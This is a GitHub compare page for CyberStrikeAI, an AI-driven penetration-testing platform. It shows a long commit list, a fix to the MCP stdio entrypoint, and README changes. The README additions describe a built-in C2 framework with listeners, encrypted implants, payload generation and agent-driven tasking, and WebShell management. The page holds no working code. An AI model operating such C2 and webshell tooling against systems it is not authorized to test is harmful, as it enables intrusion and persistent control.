Compare commits

..

283 Commits

Author SHA1 Message Date
公明 1c4d4b305b Update config.yaml 2026-05-22 15:15:46 +08:00
公明 f210ac9a03 Add files via upload 2026-05-22 11:36:36 +08:00
公明 6685076dfb Add files via upload 2026-05-22 11:35:02 +08:00
公明 7f322653f6 Add files via upload 2026-05-22 11:32:36 +08:00
公明 66ac2f1357 Add files via upload 2026-05-22 11:30:25 +08:00
公明 c446e22d0c Add files via upload 2026-05-22 11:28:51 +08:00
公明 0358d3a67d Add files via upload 2026-05-22 10:30:19 +08:00
公明 9b82f265fd Add files via upload 2026-05-20 18:24:17 +08:00
公明 3d9cae58e4 Update config.yaml 2026-05-20 17:59:57 +08:00
公明 1f1eadee5e Update config.yaml 2026-05-20 17:58:24 +08:00
公明 0569255189 Add files via upload 2026-05-20 17:54:30 +08:00
公明 8ccf90d067 Add files via upload 2026-05-20 17:52:22 +08:00
公明 b3be89f47d Add files via upload 2026-05-20 17:50:52 +08:00
公明 b9bf8f62d4 Add files via upload 2026-05-20 17:48:42 +08:00
公明 05ca0c1480 Update config.yaml 2026-05-20 16:57:50 +08:00
公明 47a4f3fc5b Add files via upload 2026-05-20 16:52:50 +08:00
公明 a3b378ae9e Add files via upload 2026-05-20 16:49:26 +08:00
公明 a904d26e78 Add files via upload 2026-05-20 16:47:34 +08:00
公明 7ba7476c4f Add files via upload 2026-05-20 16:45:59 +08:00
公明 ae25a243ac Add files via upload 2026-05-20 16:43:38 +08:00
公明 23bd6288ff Add files via upload 2026-05-20 16:39:13 +08:00
公明 fef21d3a24 Add files via upload 2026-05-20 16:36:50 +08:00
公明 933bba4517 Update config.yaml 2026-05-20 16:12:13 +08:00
公明 e1d65437cc Add files via upload 2026-05-20 16:11:10 +08:00
公明 9325aed1eb Add files via upload 2026-05-20 16:09:33 +08:00
公明 dee2b3ab42 Add files via upload 2026-05-20 16:07:33 +08:00
公明 a69bc93fa1 Add files via upload 2026-05-20 16:05:40 +08:00
公明 b1a620bfce Update config.yaml 2026-05-20 14:18:33 +08:00
公明 61b164eec2 Add files via upload 2026-05-20 11:03:38 +08:00
公明 ba77e1837e Update config.yaml 2026-05-19 23:05:52 +08:00
公明 eacad60fd6 Add files via upload 2026-05-19 23:03:04 +08:00
公明 70bf5c93bf Update config.yaml 2026-05-19 19:01:31 +08:00
公明 08bd278d8c Update config.yaml 2026-05-19 18:56:24 +08:00
公明 22746d64a3 Add files via upload 2026-05-19 18:53:46 +08:00
公明 199392a5d5 Add files via upload 2026-05-19 18:52:22 +08:00
公明 aafb4cb584 Add files via upload 2026-05-19 18:50:28 +08:00
公明 96e3dd397c Add files via upload 2026-05-19 18:48:17 +08:00
公明 ec0f17145b Add files via upload 2026-05-19 17:50:38 +08:00
公明 ed53da0999 Delete security directory 2026-05-19 17:49:21 +08:00
公明 dc440fc511 Delete robot directory 2026-05-19 17:49:10 +08:00
公明 009ae59033 Delete logger directory 2026-05-19 17:48:59 +08:00
公明 f348b3245a Delete knowledge directory 2026-05-19 17:48:44 +08:00
公明 0018c5219c Delete config directory 2026-05-19 17:48:33 +08:00
公明 01a3e3677a Delete c2 directory 2026-05-19 17:48:22 +08:00
公明 a12ecdb46f Add files via upload 2026-05-19 17:47:56 +08:00
公明 9f59230d74 Add files via upload 2026-05-19 17:46:33 +08:00
公明 085c6a1c72 Add files via upload 2026-05-19 17:43:45 +08:00
公明 7b3860971f Add files via upload 2026-05-19 17:42:12 +08:00
公明 f6f7b7b237 Add files via upload 2026-05-19 17:40:19 +08:00
公明 d5cf4b3b16 Add files via upload 2026-05-19 16:48:07 +08:00
公明 3e58d8355b Add files via upload 2026-05-19 16:32:38 +08:00
公明 eb01ade63b Add files via upload 2026-05-19 16:29:05 +08:00
公明 d1dc15fa44 Add files via upload 2026-05-19 16:27:29 +08:00
公明 73a39ef868 Add files via upload 2026-05-19 16:25:47 +08:00
公明 a022baef03 Add files via upload 2026-05-19 16:23:21 +08:00
公明 59312d428e Add files via upload 2026-05-19 14:53:07 +08:00
公明 951d14ef14 Update config.yaml 2026-05-18 23:51:19 +08:00
公明 0eb22da6e9 Add files via upload 2026-05-18 23:50:55 +08:00
公明 5fd9ef0514 Add files via upload 2026-05-18 23:47:10 +08:00
公明 9a4f3c7d35 Add files via upload 2026-05-18 17:37:29 +08:00
公明 ead2ce3ecc Add files via upload 2026-05-18 17:28:14 +08:00
公明 8733f3a2d2 Update config.yaml 2026-05-18 11:03:29 +08:00
公明 8642f3ba31 Add files via upload 2026-05-17 17:11:16 +08:00
公明 6a262a7367 Add files via upload 2026-05-17 17:09:16 +08:00
公明 eb9192ddb3 Add files via upload 2026-05-17 17:08:42 +08:00
公明 5587e75628 Add files via upload 2026-05-17 17:06:53 +08:00
公明 74bbb453e2 Add files via upload 2026-05-17 17:05:22 +08:00
公明 66842f6206 Add files via upload 2026-05-17 17:01:48 +08:00
公明 dc1779275d Add files via upload 2026-05-16 13:46:24 +08:00
公明 10dff937b1 Update config.yaml 2026-05-16 13:00:29 +08:00
公明 d4e1fe3bbe Add files via upload 2026-05-15 18:03:59 +08:00
公明 179976ae57 Add files via upload 2026-05-15 17:49:33 +08:00
公明 1c758bb98c Add files via upload 2026-05-15 17:34:25 +08:00
公明 17c4f38ee3 Add files via upload 2026-05-15 17:27:45 +08:00
公明 cd7e57d121 Add files via upload 2026-05-15 14:55:43 +08:00
公明 0f2c3f65cc Add files via upload 2026-05-15 14:21:40 +08:00
公明 7779666e27 Update config.yaml 2026-05-15 14:19:18 +08:00
公明 c74bd4403b Add files via upload 2026-05-15 14:16:04 +08:00
公明 04d23ddb43 Update config.yaml 2026-05-15 14:14:09 +08:00
公明 0874e84393 Add files via upload 2026-05-15 14:12:52 +08:00
公明 57f57f30b1 Add files via upload 2026-05-15 14:11:24 +08:00
公明 f37d613a0c Add files via upload 2026-05-15 14:09:37 +08:00
公明 87d0ff9154 Update config.yaml 2026-05-15 14:08:28 +08:00
公明 b3418f39b8 Update config.yaml 2026-05-15 11:53:07 +08:00
公明 f9e1ca0e2d Add files via upload 2026-05-15 11:49:53 +08:00
公明 2c45879669 Add files via upload 2026-05-15 11:48:58 +08:00
公明 1cdcfa2c2d Add files via upload 2026-05-15 11:47:34 +08:00
公明 eab5b73846 Add files via upload 2026-05-15 11:46:02 +08:00
公明 d961ba1ec7 Add files via upload 2026-05-15 11:43:33 +08:00
公明 1ba5e57ec6 Update config.yaml 2026-05-14 19:35:37 +08:00
公明 1216d25f96 Add files via upload 2026-05-14 19:33:15 +08:00
公明 fde693408e Add files via upload 2026-05-14 19:31:21 +08:00
公明 352a81a869 Add files via upload 2026-05-14 19:29:59 +08:00
公明 b2562b1010 Add files via upload 2026-05-14 19:28:37 +08:00
公明 0d8ba51087 Add files via upload 2026-05-14 19:26:23 +08:00
公明 0b847fcea3 Delete multiagent directory 2026-05-14 19:25:42 +08:00
公明 bf2f49fe62 Delete skillpackage directory 2026-05-14 19:25:19 +08:00
公明 75e64b1a86 Delete einomcp directory 2026-05-14 19:25:09 +08:00
公明 2167735022 Delete database directory 2026-05-14 19:24:58 +08:00
公明 4ee292cc1f Delete storage directory 2026-05-14 19:24:48 +08:00
公明 961205940f Delete agents directory 2026-05-14 19:24:19 +08:00
公明 ffe797bd06 Delete agent directory 2026-05-14 19:24:04 +08:00
公明 b6c864547e Delete mcp directory 2026-05-14 19:23:52 +08:00
公明 da369c2edc Add files via upload 2026-05-14 19:23:27 +08:00
公明 54dc31a616 Add files via upload 2026-05-14 19:21:35 +08:00
公明 9e0b985221 Add files via upload 2026-05-14 19:19:26 +08:00
公明 eb47077082 Update config.yaml 2026-05-14 14:59:27 +08:00
公明 f9a482857d Add files via upload 2026-05-14 11:57:00 +08:00
公明 679a68b12f Add files via upload 2026-05-14 11:55:47 +08:00
公明 840a26c7ef Add files via upload 2026-05-14 11:54:23 +08:00
公明 030e69c02d Add files via upload 2026-05-14 11:49:08 +08:00
公明 d9683cdb44 Add files via upload 2026-05-14 11:33:12 +08:00
公明 60a063dd7d Add files via upload 2026-05-14 11:31:56 +08:00
公明 5f0c1805a7 Add files via upload 2026-05-14 11:30:28 +08:00
公明 cb7e66001b Update config.yaml 2026-05-13 17:09:31 +08:00
公明 4ea838f1d7 Update config.yaml 2026-05-13 16:48:03 +08:00
公明 573648fc4b Add files via upload 2026-05-13 16:43:26 +08:00
公明 f0e090abea Add files via upload 2026-05-13 16:41:23 +08:00
公明 549dcf518c Add files via upload 2026-05-13 16:39:08 +08:00
公明 c74e20c54a Add files via upload 2026-05-13 16:36:09 +08:00
公明 c94a9fd9e9 Add files via upload 2026-05-13 15:26:02 +08:00
公明 ce9749a8ef Update config.yaml 2026-05-13 15:23:18 +08:00
公明 145da12017 Add files via upload 2026-05-13 12:33:23 +08:00
公明 5111f4c311 Add files via upload 2026-05-13 12:08:28 +08:00
公明 8f6384a083 Add files via upload 2026-05-13 12:06:56 +08:00
公明 762f778e1e Add files via upload 2026-05-13 12:05:12 +08:00
公明 4a11ba8f14 Add files via upload 2026-05-13 10:40:56 +08:00
公明 86090af4df Update config.yaml 2026-05-12 17:34:59 +08:00
公明 2dea6e36bd Add files via upload 2026-05-12 17:33:14 +08:00
公明 38ce695708 Update config.yaml 2026-05-12 17:29:45 +08:00
公明 41fe90faa3 Add files via upload 2026-05-12 17:23:57 +08:00
公明 9f54bdb1bf Add files via upload 2026-05-12 17:22:19 +08:00
公明 08e727aa41 Add files via upload 2026-05-12 17:19:51 +08:00
公明 176c17d630 Add files via upload 2026-05-12 17:17:36 +08:00
公明 62710f6619 Add files via upload 2026-05-12 16:42:43 +08:00
公明 e4dbb96b3e Add files via upload 2026-05-12 16:41:15 +08:00
公明 832532213a Add files via upload 2026-05-12 16:39:09 +08:00
公明 eb04ac0c3a Delete web/templates/index.html.bak 2026-05-12 16:36:51 +08:00
公明 1946508325 Add files via upload 2026-05-12 16:36:23 +08:00
公明 89d1c5124f Add files via upload 2026-05-12 14:57:04 +08:00
公明 1e7a3299a5 Merge pull request #118 from Dilligaf371/fix/mcp-stdio-init-result-storage
fix(mcp-stdio): initialize result storage so query tools work
2026-05-12 13:01:04 +08:00
公明 cae3a77331 Add files via upload 2026-05-12 12:56:11 +08:00
公明 2e1e57ce27 Add files via upload 2026-05-12 12:55:02 +08:00
公明 45b6ed2847 Add files via upload 2026-05-12 12:53:20 +08:00
公明 88eadf13a4 Add files via upload 2026-05-12 12:48:42 +08:00
Gilles Ceyssat dca5666b18 fix(mcp-stdio): initialize result storage so query tools work
The stdio MCP entrypoint (cmd/mcp-stdio/main.go) constructed the
security Executor without calling SetResultStorage, leaving it nil.
Any tool that goes through the query path — notably `exec` (the
generic shell tool) and the YAML wrappers that emit large results —
failed with:

    "错误: 结果存储未初始化"  (Error: result storage not initialized)

The full HTTP app at internal/app/app.go:118-147 initializes a
FileResultStorage from cfg.Agent.ResultStorageDir and wires it via
both agent.SetResultStorage and executor.SetResultStorage. The stdio
entrypoint needs the same wiring.

This replicates the storage init block in main.go so stdio-mode tool
execution stops failing on the query path.

Verified: before, `exec` calls returned the "结果存储未初始化" error.
After, `exec nmap -p 22,80,443 127.0.0.1` (bridged through an
external MCP client) returns the full nmap output as expected.
2026-05-12 08:13:13 +04:00
公明 e5d52cdf85 Update config.yaml 2026-05-11 20:36:58 +08:00
公明 65e48826ff Update config.yaml 2026-05-11 19:59:41 +08:00
公明 0cff507272 Add files via upload 2026-05-11 19:57:46 +08:00
公明 30afd71c05 Add files via upload 2026-05-11 19:56:38 +08:00
公明 d2b6a154de Add files via upload 2026-05-11 19:54:40 +08:00
公明 278d5aa25c Add files via upload 2026-05-11 19:52:39 +08:00
公明 215f5a4a93 Update config.yaml 2026-05-10 23:33:39 +08:00
公明 44185d748d Add files via upload 2026-05-10 23:28:18 +08:00
公明 fe47f1f058 Add files via upload 2026-05-10 23:27:07 +08:00
公明 99ce183f41 Add files via upload 2026-05-10 23:25:11 +08:00
公明 2ed1947f36 Add files via upload 2026-05-10 23:22:35 +08:00
公明 97f3e8c179 Add files via upload 2026-05-10 22:52:34 +08:00
公明 38b0c31b87 Add files via upload 2026-05-10 22:47:04 +08:00
公明 cb839da4d1 Add files via upload 2026-05-10 22:44:51 +08:00
公明 5ed730f17c Add files via upload 2026-05-10 22:43:21 +08:00
公明 30b1e5f820 Add files via upload 2026-05-10 22:16:12 +08:00
公明 8e5c70703e Add files via upload 2026-05-10 22:14:51 +08:00
公明 3cc3b25a7b Add files via upload 2026-05-10 22:12:23 +08:00
公明 44cf63fa52 Add files via upload 2026-05-10 22:10:33 +08:00
公明 12057c065b Add files via upload 2026-05-10 21:39:50 +08:00
公明 c4e0b9735c Add files via upload 2026-05-10 21:38:28 +08:00
公明 218e9b9880 Add files via upload 2026-05-10 21:36:28 +08:00
公明 82d840966e Add files via upload 2026-05-10 21:34:34 +08:00
公明 c62ff3bde9 Add files via upload 2026-05-10 20:29:34 +08:00
公明 df2506b651 Add files via upload 2026-05-10 02:04:23 +08:00
公明 efe9172f85 Add files via upload 2026-05-10 02:03:07 +08:00
公明 b788bc6dab Add files via upload 2026-05-10 02:01:28 +08:00
公明 9134f2bbcb Update config.yaml 2026-05-10 01:53:51 +08:00
公明 d76cf2a162 Add files via upload 2026-05-10 00:58:35 +08:00
公明 2f96feb98f Add files via upload 2026-05-10 00:57:26 +08:00
公明 a374c3950c Add files via upload 2026-05-10 00:55:20 +08:00
公明 a93e3455fa Add files via upload 2026-05-10 00:53:33 +08:00
公明 6cd864c5ca Update config.yaml 2026-05-08 23:00:15 +08:00
公明 e34faff001 Add files via upload 2026-05-08 22:45:46 +08:00
公明 fa09796ddd Add files via upload 2026-05-08 22:44:32 +08:00
公明 1ab7e98f56 Add files via upload 2026-05-08 22:42:31 +08:00
公明 0743086873 Add files via upload 2026-05-08 22:32:21 +08:00
公明 a1ceb9c108 Add files via upload 2026-05-08 17:22:40 +08:00
公明 9ddea33dab Add files via upload 2026-05-08 17:15:27 +08:00
公明 e948940b18 Delete images/dashboard.png 2026-05-08 17:14:56 +08:00
公明 94bbbf87bf Add files via upload 2026-05-08 16:50:56 +08:00
公明 4f09ffbaaa Add files via upload 2026-05-08 13:57:18 +08:00
公明 6d77081b2b Add files via upload 2026-05-08 13:56:04 +08:00
公明 99ccb07ec9 Add files via upload 2026-05-08 13:54:25 +08:00
公明 1130fdbfa4 Add files via upload 2026-05-08 13:08:45 +08:00
公明 84f4da4d1d Add files via upload 2026-05-08 13:07:33 +08:00
公明 34dae98329 Add files via upload 2026-05-08 13:05:45 +08:00
公明 3ee7d64b09 Add files via upload 2026-05-08 13:04:18 +08:00
公明 22a3aa1531 Add files via upload 2026-05-07 18:03:19 +08:00
公明 8ad61906fa Add files via upload 2026-05-07 18:02:15 +08:00
公明 487522707f Add files via upload 2026-05-07 18:00:22 +08:00
公明 fe625010eb Update config.yaml 2026-05-07 17:04:39 +08:00
公明 40cd0293b5 Add files via upload 2026-05-07 17:04:14 +08:00
公明 b62dc1f326 Add files via upload 2026-05-07 17:02:26 +08:00
公明 6d180c814d Add files via upload 2026-05-07 17:01:15 +08:00
公明 e68d3a3d23 Add files via upload 2026-05-07 16:58:54 +08:00
公明 699b9181e6 Add files via upload 2026-05-07 16:57:17 +08:00
公明 7b9070f106 Update config.yaml 2026-05-06 21:37:55 +08:00
公明 5a31b69245 Add files via upload 2026-05-06 21:31:21 +08:00
公明 104a6e30d5 Add files via upload 2026-05-06 21:29:25 +08:00
公明 80c4299dbb Add files via upload 2026-05-06 21:26:38 +08:00
公明 debe967272 Add files via upload 2026-05-06 20:50:28 +08:00
公明 b28f9c25f8 Update config.yaml 2026-05-06 18:00:13 +08:00
公明 6f5d0b0174 Add files via upload 2026-05-06 17:59:31 +08:00
公明 231a48db8e Add files via upload 2026-05-06 17:58:42 +08:00
公明 d82ea60827 Add files via upload 2026-05-06 17:56:30 +08:00
公明 24a0c813e2 Add files via upload 2026-05-06 17:50:59 +08:00
公明 24938f92ff Add files via upload 2026-05-04 13:22:36 +08:00
公明 b24bc63964 Update config.yaml 2026-05-04 13:19:35 +08:00
公明 60517fff44 Update config.yaml 2026-05-04 13:12:56 +08:00
公明 d2635eeb9c Add files via upload 2026-05-04 13:12:09 +08:00
公明 57ebc7c04b Add files via upload 2026-05-04 13:09:43 +08:00
公明 b27e443d37 Add files via upload 2026-05-04 13:07:37 +08:00
公明 9b4c6dedc8 Add files via upload 2026-05-04 04:50:53 +08:00
公明 d603060511 Add files via upload 2026-05-04 03:52:47 +08:00
公明 ad86623dc1 Update config.yaml 2026-05-04 03:46:24 +08:00
公明 8185539f33 Add files via upload 2026-05-04 03:45:24 +08:00
公明 8158b38f48 Add files via upload 2026-05-04 03:44:08 +08:00
公明 4fca4a85c2 Add files via upload 2026-05-04 03:42:24 +08:00
公明 62c6f3f191 Add files via upload 2026-05-02 19:58:36 +08:00
公明 dec69a1993 Update config.yaml 2026-05-01 01:33:17 +08:00
公明 15aab2584a Add files via upload 2026-05-01 01:32:54 +08:00
公明 399b697d75 Add files via upload 2026-05-01 01:31:19 +08:00
公明 e0753fd03e Add files via upload 2026-05-01 01:28:19 +08:00
公明 9b1e493023 Add files via upload 2026-05-01 01:05:48 +08:00
公明 77d212098d Add files via upload 2026-05-01 01:03:28 +08:00
公明 39926007fe Add files via upload 2026-05-01 01:01:30 +08:00
公明 0e35506ae1 Add files via upload 2026-05-01 01:00:23 +08:00
公明 9ff8bfa44b Add files via upload 2026-04-30 20:31:17 +08:00
公明 1d9fcfd87e Update version number to v1.5.16 2026-04-30 20:28:21 +08:00
公明 91cb650234 Add files via upload 2026-04-30 15:20:13 +08:00
公明 44e7d3b340 Add files via upload 2026-04-30 15:01:35 +08:00
公明 531b05299a Add files via upload 2026-04-30 10:49:19 +08:00
公明 0de69a6345 Add files via upload 2026-04-30 10:43:23 +08:00
公明 6a2a445f32 Update config.yaml 2026-04-30 01:56:47 +08:00
公明 6aaa21d3e0 Add files via upload 2026-04-30 01:55:23 +08:00
公明 5c57d358ef Add files via upload 2026-04-30 01:53:46 +08:00
公明 65a3475c02 Add files via upload 2026-04-30 01:52:11 +08:00
公明 516ebf7a65 Add files via upload 2026-04-29 22:40:17 +08:00
公明 2558be3d7d Add files via upload 2026-04-29 22:38:14 +08:00
公明 f6bb455313 Update config.yaml 2026-04-29 17:14:19 +08:00
公明 fc64356282 Add files via upload 2026-04-29 17:10:53 +08:00
公明 3d4fce9b89 Add files via upload 2026-04-29 17:09:37 +08:00
公明 3e41a47abf Add files via upload 2026-04-29 17:05:02 +08:00
公明 5b942c7bc8 Add files via upload 2026-04-29 17:03:51 +08:00
公明 bcfb7b8da1 Update config.yaml 2026-04-29 04:11:31 +08:00
公明 f420ae0265 Add files via upload 2026-04-29 03:28:32 +08:00
公明 e3f59b29ab Add files via upload 2026-04-29 03:26:27 +08:00
公明 87cba37203 Add files via upload 2026-04-29 03:24:48 +08:00
公明 4773b9e963 Update config.yaml 2026-04-29 03:01:21 +08:00
公明 eda5f9bba1 Add files via upload 2026-04-29 02:59:34 +08:00
公明 1318607813 Add files via upload 2026-04-29 02:57:22 +08:00
公明 5100924abe Add files via upload 2026-04-29 02:54:43 +08:00
公明 44079674dd Add files via upload 2026-04-28 14:07:01 +08:00
公明 d959390e27 Update config.yaml 2026-04-28 11:45:27 +08:00
公明 62a0d8cb71 Add files via upload 2026-04-28 11:40:09 +08:00
公明 b53cae3a02 Add files via upload 2026-04-28 11:37:52 +08:00
公明 3b3d094dc4 Add files via upload 2026-04-28 10:26:09 +08:00
公明 47922c2083 Add files via upload 2026-04-28 10:23:24 +08:00
公明 dfaf0bc77f Update config.yaml 2026-04-28 01:23:57 +08:00
公明 3eb7edb1b8 Add files via upload 2026-04-28 01:23:33 +08:00
公明 f82f6b861e Add files via upload 2026-04-28 01:22:21 +08:00
公明 2acf43c454 Add files via upload 2026-04-28 01:19:01 +08:00
公明 fad6b3c808 Add files via upload 2026-04-28 01:05:58 +08:00
公明 0597838217 Add files via upload 2026-04-28 01:04:58 +08:00
公明 1532426b4f Add files via upload 2026-04-28 01:02:30 +08:00
公明 3aeb8c3474 Add files via upload 2026-04-28 00:37:46 +08:00
公明 b2b166972a Add files via upload 2026-04-28 00:33:29 +08:00
公明 36b669771c Delete internal/multiagent directory 2026-04-28 00:30:34 +08:00
公明 96564d4d89 Update default_single_system_prompt.go 2026-04-27 14:58:49 +08:00
公明 d85afa2d39 Add files via upload 2026-04-27 11:29:16 +08:00
公明 55b6bceb21 Update config.yaml 2026-04-26 15:11:48 +08:00
公明 65d73b3d66 Add files via upload 2026-04-26 15:08:48 +08:00
公明 913115d1fb Add files via upload 2026-04-26 04:26:29 +08:00
公明 e1b967d781 Add files via upload 2026-04-26 04:18:38 +08:00
公明 9d9efa886f Add files via upload 2026-04-26 04:17:27 +08:00
公明 cae45e9dc5 Add files via upload 2026-04-26 04:16:25 +08:00
226 changed files with 42425 additions and 6217 deletions
+23 -10
View File
@@ -1,5 +1,5 @@
<div align="center"> <div align="center">
<img src="web/static/logo.png" alt="CyberStrikeAI Logo" width="200"> <img src="images/logo.png" alt="CyberStrikeAI Logo" width="200">
</div> </div>
# CyberStrikeAI # CyberStrikeAI
@@ -27,7 +27,7 @@ If CyberStrikeAI helps you, you can support the project via **WeChat Pay** or **
</details> </details>
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, and comprehensive lifecycle management capabilities. Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams. CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, comprehensive lifecycle management capabilities, and a **built-in lightweight C2 (Command & Control) framework** for **authorized** engagements (listeners, encrypted implants, sessions, tasks, real-time events, REST and MCP). Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
## Interface & Integration Preview ## Interface & Integration Preview
@@ -121,6 +121,7 @@ CyberStrikeAI is an **AI-native security testing platform** built in Go. It inte
- 📱 **Chatbot**: DingTalk and Lark (Feishu) long-lived connections so you can talk to CyberStrikeAI from mobile (see [Robot / Chatbot guide](docs/robot_en.md) for setup and commands) - 📱 **Chatbot**: DingTalk and Lark (Feishu) long-lived connections so you can talk to CyberStrikeAI from mobile (see [Robot / Chatbot guide](docs/robot_en.md) for setup and commands)
- 🧑‍⚖️ **Human-in-the-loop (HITL)**: Chat sidebar to set approval mode and tool allowlists (listed tools skip approval); global list in `config.yaml` under `hitl.tool_whitelist`; **Apply** can merge new tools into the file and update the running server without restart; dedicated **HITL** page for pending approvals - 🧑‍⚖️ **Human-in-the-loop (HITL)**: Chat sidebar to set approval mode and tool allowlists (listed tools skip approval); global list in `config.yaml` under `hitl.tool_whitelist`; **Apply** can merge new tools into the file and update the running server without restart; dedicated **HITL** page for pending approvals
- 🐚 **WebShell management**: Add and manage WebShell connections (e.g. IceSword/AntSword compatible), use a virtual terminal for command execution, a built-in file manager for file operations, and an AI assistant tab that orchestrates tests and keeps per-connection conversation history; supports PHP, ASP, ASPX, JSP and custom shell types with configurable request method and command parameter. - 🐚 **WebShell management**: Add and manage WebShell connections (e.g. IceSword/AntSword compatible), use a virtual terminal for command execution, a built-in file manager for file operations, and an AI assistant tab that orchestrates tests and keeps per-connection conversation history; supports PHP, ASP, ASPX, JSP and custom shell types with configurable request method and command parameter.
- 📡 **Built-in C2**: AI-oriented lightweight command-and-control—**listeners** (TCP reverse, HTTP/HTTPS beacon, WebSocket), **encrypted** beacon channel, **session** and **task** queues with persistence, **payload** helpers (one-liner / build / download), **SSE** live events, REST under `/api/c2/*`, plus unified MCP tools (`c2_listener`, `c2_session`, **`c2_task`**, `c2_task_manage`, `c2_payload`, `c2_event`, `c2_profile`, `c2_file`); optional **HITL** approval for sensitive operations and OPSEC-style controls (e.g. command deny rules). **Authorized testing only.**
## Plugins ## Plugins
@@ -173,9 +174,11 @@ The `run.sh` script will automatically:
- ✅ Build the project - ✅ Build the project
- ✅ Start the server - ✅ Start the server
**Networking defaults:** `run.sh` starts the server with **`--https`** and the repo **`config.yaml`** (local self-signed TLS; better for many concurrent streams). Use **`./run.sh --http`** for plain HTTP. In production, set **`server.tls_cert_path`** / **`server.tls_key_path`** in **`config.yaml`** (see comments there). For manual runs, add **`--https`** or **`CYBERSTRIKE_HTTPS=1`**; if **`-config`** is wrong, the binary prints a short usage hint on stderr.
**First-Time Configuration:** **First-Time Configuration:**
1. **Configure OpenAI-compatible API** (required before first use) 1. **Configure OpenAI-compatible API** (required before first use)
- Open http://localhost:8080 after launch - After launch, open **`https://127.0.0.1:8080/`** (or **`https://localhost:8080/`**; replace **8080** with `server.port` in `config.yaml`) and accept the self-signed certificate warning once. If you used `./run.sh --http`, use **`http://`** instead.
- Go to `Settings` → Fill in your API credentials: - Go to `Settings` → Fill in your API credentials:
```yaml ```yaml
openai: openai:
@@ -196,21 +199,23 @@ The `run.sh` script will automatically:
**Alternative Launch Methods:** **Alternative Launch Methods:**
```bash ```bash
# Direct Go run (requires manual setup) # Direct Go run (set up env yourself); add --https to match run.sh defaults
go run cmd/server/main.go go run cmd/server/main.go --https
# Manual build # Manual build
go build -o cyberstrike-ai cmd/server/main.go go build -o cyberstrike-ai cmd/server/main.go
./cyberstrike-ai ./cyberstrike-ai --https
``` ```
If server logs show `client sent an HTTP request to an HTTPS server`, a client is still using **`http://`** on a TLS-only port—switch the URL to **`https://`**.
**Note:** The Python virtual environment (`venv/`) is automatically created and managed by `run.sh`. Tools that require Python (like `api-fuzzer`, `http-framework-test`, etc.) will automatically use this environment. **Note:** The Python virtual environment (`venv/`) is automatically created and managed by `run.sh`. Tools that require Python (like `api-fuzzer`, `http-framework-test`, etc.) will automatically use this environment.
### Version Update (No Breaking Changes) ### Version Update (No Breaking Changes)
**CyberStrikeAI one-click upgrade (recommended):** **CyberStrikeAI one-click upgrade (recommended):**
1. (First time) enable the script: `chmod +x upgrade.sh` 1. (First time) enable the script: `chmod +x upgrade.sh`
2. Upgrade with: `./upgrade.sh` (optional flags: `--tag vX.Y.Z`, `--no-venv`, `--preserve-custom`, `--yes`) 2. Upgrade with: `./upgrade.sh` (optional flags: `--tag vX.Y.Z`, `--no-venv`, `--yes`). Local `tools/`, `roles/`, and `skills/` are always preserved.
3. The script will back up your `config.yaml` and `data/`, upgrade the code from GitHub Release, update `config.yaml`'s `version`, then restart the server. 3. The script will back up your `config.yaml` and `data/`, upgrade the code from GitHub Release, update `config.yaml`'s `version`, then restart the server.
Recommended one-liner: Recommended one-liner:
@@ -237,6 +242,7 @@ Requirements / tips:
- **Vulnerability management** Create, update, and track vulnerabilities discovered during testing. Filter by severity (critical/high/medium/low/info), status (open/confirmed/fixed/false_positive), and conversation. View statistics and export findings. - **Vulnerability management** Create, update, and track vulnerabilities discovered during testing. Filter by severity (critical/high/medium/low/info), status (open/confirmed/fixed/false_positive), and conversation. View statistics and export findings.
- **Batch task management** Create task queues with multiple tasks, add or edit tasks before execution, and run them sequentially. Each task executes as a separate conversation, with status tracking (pending/running/completed/failed/cancelled) and full execution history. - **Batch task management** Create task queues with multiple tasks, add or edit tasks before execution, and run them sequentially. Each task executes as a separate conversation, with status tracking (pending/running/completed/failed/cancelled) and full execution history.
- **WebShell management** Add and manage WebShell connections (PHP/ASP/ASPX/JSP or custom). Use the virtual terminal to run commands, the file manager to list, read, edit, upload, and delete files, and the AI assistant tab to drive scripted tests with per-connection conversation history. Connections are stored in SQLite; supports GET/POST and configurable command parameter (e.g. IceSword/AntSword style). - **WebShell management** Add and manage WebShell connections (PHP/ASP/ASPX/JSP or custom). Use the virtual terminal to run commands, the file manager to list, read, edit, upload, and delete files, and the AI assistant tab to drive scripted tests with per-connection conversation history. Connections are stored in SQLite; supports GET/POST and configurable command parameter (e.g. IceSword/AntSword style).
- **Built-in C2** Create/start **listeners**, generate **payloads**, track **sessions**, enqueue **tasks**, and subscribe to **events** (SSE) from the Web UI or `/api/c2/*`. Agents and external clients use the C2 MCP tool family (including **`c2_task`**); when HITL is enabled, high-risk tasks can require human approval. Intended **only** for systems you are explicitly authorized to test.
- **Settings** Tweak provider keys, MCP enablement, tool toggles, and agent iteration limits. - **Settings** Tweak provider keys, MCP enablement, tool toggles, and agent iteration limits.
- **Human-in-the-loop (HITL)** Sidebar sets mode and allowlisted tools (comma- or newline-separated); global list lives in `config.yaml` under `hitl.tool_whitelist`. **Apply** updates browser/server and can merge new tools into the file (**no restart**). **New chat** keeps sidebar choices; **HITL** nav shows pending approvals. Removing a tool in the sidebar does not remove it from the global list in `config.yaml`—edit the file if needed. - **Human-in-the-loop (HITL)** Sidebar sets mode and allowlisted tools (comma- or newline-separated); global list lives in `config.yaml` under `hitl.tool_whitelist`. **Apply** updates browser/server and can merge new tools into the file (**no restart**). **New chat** keeps sidebar choices; **HITL** nav shows pending approvals. Removing a tool in the sidebar does not remove it from the global list in `config.yaml`—edit the file if needed.
@@ -279,7 +285,7 @@ Requirements / tips:
- **Supervisor orchestrator**: fixed name **`orchestrator-supervisor.md`** (plus optional `orchestrator_instruction_supervisor`); requires at least one sub-agent. - **Supervisor orchestrator**: fixed name **`orchestrator-supervisor.md`** (plus optional `orchestrator_instruction_supervisor`); requires at least one sub-agent.
